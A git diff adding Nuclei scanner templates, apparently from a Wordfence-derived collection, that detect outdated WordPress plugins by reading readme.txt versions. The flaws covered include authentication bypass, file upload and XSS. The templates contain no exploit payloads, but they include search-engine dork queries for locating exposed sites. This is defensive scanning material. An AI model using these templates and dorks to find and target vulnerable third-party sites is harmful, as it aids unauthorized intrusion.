-# digest: 4b0a00483046022100abbf084a12dda14741c23c4c2c7c8e7b6e231142a8333a69df8844ea1271532d022100a7a0d0f5b8caf3beb1708fed446cd4bf7efbe83fc8fa26aae836cb243dd64804:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+ matchers:
+ - type: word
+ words:
+ - '{{randstr}}'
\ No newline at end of file
diff --git a/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml b/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml
new file mode 100644
index 0000000000..10e9dd293d
--- /dev/null
+++ b/poc/wordpress/leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed.yaml
@@ -0,0 +1,59 @@
+id: leopard-wordpress-offload-media-9c17da68fdae227d54ebf6f8caf803ed
+
+info:
+ name: >
+ Leopard - WordPress offload media <= 2.0.36 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/35b1fb1a-a12c-4938-a2d2-74e291db76ef?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/"
+ google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leopard-wordpress-offload-media"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.36')
\ No newline at end of file
diff --git a/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml b/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml
new file mode 100644
index 0000000000..ddf86b77af
--- /dev/null
+++ b/poc/wordpress/leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43.yaml
@@ -0,0 +1,59 @@
+id: leopard-wordpress-offload-media-b3f7a58954d39d9abc50308a2c689e43
+
+info:
+ name: >
+ Leopard - WordPress offload media <= 2.0.36 - Authenticated (Subscriber+) Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/00aba7b3-4d4a-4aba-8e4e-2e8a928f6143?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/leopard-wordpress-offload-media/"
+ google-query: inurl:"/wp-content/plugins/leopard-wordpress-offload-media/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,leopard-wordpress-offload-media,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/leopard-wordpress-offload-media/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "leopard-wordpress-offload-media"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.36')
\ No newline at end of file
diff --git a/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml b/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml
new file mode 100644
index 0000000000..72252f4851
--- /dev/null
+++ b/poc/wordpress/wp-analytify-690113e54f3bf0d5f9d38a1c0e496671.yaml
@@ -0,0 +1,59 @@
+id: wp-analytify-690113e54f3bf0d5f9d38a1c0e496671
+
+info:
+ name: >
+ Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-analytify/"
+ google-query: inurl:"/wp-content/plugins/wp-analytify/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-analytify,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-analytify"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.3.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml b/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml
new file mode 100644
index 0000000000..99b6135578
--- /dev/null
+++ b/poc/wordpress/wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef.yaml
@@ -0,0 +1,59 @@
+id: wp-backitup-6d7624f1a355f81ed15c3cab9cab1cef
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-backitup,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml b/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml
new file mode 100644
index 0000000000..750355b800
--- /dev/null
+++ b/poc/wordpress/wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26.yaml
@@ -0,0 +1,59 @@
+id: wp-backitup-d95ab76956a3a3ae8a78b7b0e717ab26
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-backitup,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml b/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml
new file mode 100644
index 0000000000..5d9cefd989
--- /dev/null
+++ b/poc/wordpress/wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3.yaml
@@ -0,0 +1,59 @@
+id: wp-backitup-fcd17f08d1a9c35b5d53d2f4bf4571b3
+
+info:
+ name: >
+ Backup and Restore WordPress <= 1.50 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-backitup/"
+ google-query: inurl:"/wp-content/plugins/wp-backitup/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-backitup,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-backitup"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.50')
\ No newline at end of file
diff --git a/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml b/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml
new file mode 100644
index 0000000000..24577ef5b4
--- /dev/null
+++ b/poc/wordpress/wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f.yaml
@@ -0,0 +1,59 @@
+id: wp-file-manager-pro-962f01fbfbb75e336f57a45f47f4bf7f
+
+info:
+ name: >
+ File Manager Pro <= 8.3.7 - Authenticated (Subscriber+) Arbitrary File Upload
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f4b45791-4b85-4a2d-8019-1d438bd694cb?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-file-manager-pro/"
+ google-query: inurl:"/wp-content/plugins/wp-file-manager-pro/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-file-manager-pro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-file-manager-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-file-manager-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 8.3.7')
\ No newline at end of file
diff --git a/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml b/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml
new file mode 100644
index 0000000000..cb848da5db
--- /dev/null
+++ b/poc/wordpress/wp-job-portal-86811d18d4d789d537deb1f6ba496b4c.yaml
@@ -0,0 +1,59 @@
+id: wp-job-portal-86811d18d4d789d537deb1f6ba496b4c
+
+info:
+ name: >
+ WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-job-portal/"
+ google-query: inurl:"/wp-content/plugins/wp-job-portal/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-job-portal,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-job-portal"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.6')
\ No newline at end of file
diff --git a/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml b/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
new file mode 100644
index 0000000000..d29acfc8d2
--- /dev/null
+++ b/poc/wordpress/wp-jobsearch-03c799c8c1a4335310c615dc29112568.yaml
@@ -0,0 +1,59 @@
+id: wp-jobsearch-03c799c8c1a4335310c615dc29112568
+
+info:
+ name: >
+ JobSearch <= 2.3.4 - Authentication Bypass to Account Takeover
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7250da0a-1ac6-48a6-a480-0721d604add3?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-jobsearch/"
+ google-query: inurl:"/wp-content/plugins/wp-jobsearch/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-jobsearch,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-jobsearch/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-jobsearch"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml b/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml
new file mode 100644
index 0000000000..396dfc34bc
--- /dev/null
+++ b/poc/wordpress/wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871.yaml
@@ -0,0 +1,59 @@
+id: wp-lister-for-ebay-39ebd4cb09d0bf4c1884fa3ed2e4f871
+
+info:
+ name: >
+ WP-Lister Lite for eBay <= 3.6.0 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a76ded81-4c78-4054-9a26-7e215285a2b6?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-lister-for-ebay/"
+ google-query: inurl:"/wp-content/plugins/wp-lister-for-ebay/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-lister-for-ebay,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-lister-for-ebay/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-lister-for-ebay"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml b/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml
new file mode 100644
index 0000000000..4517a6a672
--- /dev/null
+++ b/poc/wordpress/wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55.yaml
@@ -0,0 +1,59 @@
+id: wp-product-feed-manager-3ca2d1a24cdf7cdf696fe37878898f55
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary File Deletion
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ffd6e18d-9173-4911-af64-5d54c6d2e052?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml b/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml
new file mode 100644
index 0000000000..eb1bff88e7
--- /dev/null
+++ b/poc/wordpress/wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5.yaml
@@ -0,0 +1,59 @@
+id: wp-product-feed-manager-d9c6a68c243dd60a3c19bbdad57c04f5
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml b/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml
new file mode 100644
index 0000000000..46ffd1779c
--- /dev/null
+++ b/poc/wordpress/wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af.yaml
@@ -0,0 +1,59 @@
+id: wp-travel-blocks-2d175246c46ae37e6bc999dc696b78af
+
+info:
+ name: >
+ WP Travel Gutenberg Blocks <= 3.5.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/55fd9ca6-fe57-490d-bfde-492957035311?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-travel-blocks/"
+ google-query: inurl:"/wp-content/plugins/wp-travel-blocks/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-travel-blocks,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-travel-blocks/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-travel-blocks"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.5.1')
\ No newline at end of file
diff --git a/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml b/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
new file mode 100644
index 0000000000..3f5e5ea6fa
--- /dev/null
+++ b/poc/wordpress/wpforo-3618db85525168de727aa60e2eab2dfa.yaml
@@ -0,0 +1,59 @@
+id: wpforo-3618db85525168de727aa60e2eab2dfa
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Unauthenticated Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/99650c4d-d8ef-4970-af65-b22b7fdf3543?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpforo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml b/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml
new file mode 100644
index 0000000000..8a17ca5bc0
--- /dev/null
+++ b/poc/wordpress/wpforo-65d61d404575f7ac7abdc6590b29296c.yaml
@@ -0,0 +1,59 @@
+id: wpforo-65d61d404575f7ac7abdc6590b29296c
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wpforo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml b/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml
new file mode 100644
index 0000000000..dcf6531a04
--- /dev/null
+++ b/poc/wordpress/wptelegram-widget-a37d54894422d71175e71f451950cb5b.yaml
@@ -0,0 +1,59 @@
+id: wptelegram-widget-a37d54894422d71175e71f451950cb5b
+
+info:
+ name: >
+ WP Telegram Widget and Join Link <= 2.1.27 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1ff77089-c6c9-49af-8b08-0977a526fa23?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wptelegram-widget/"
+ google-query: inurl:"/wp-content/plugins/wptelegram-widget/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wptelegram-widget,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wptelegram-widget/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wptelegram-widget"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.27')
\ No newline at end of file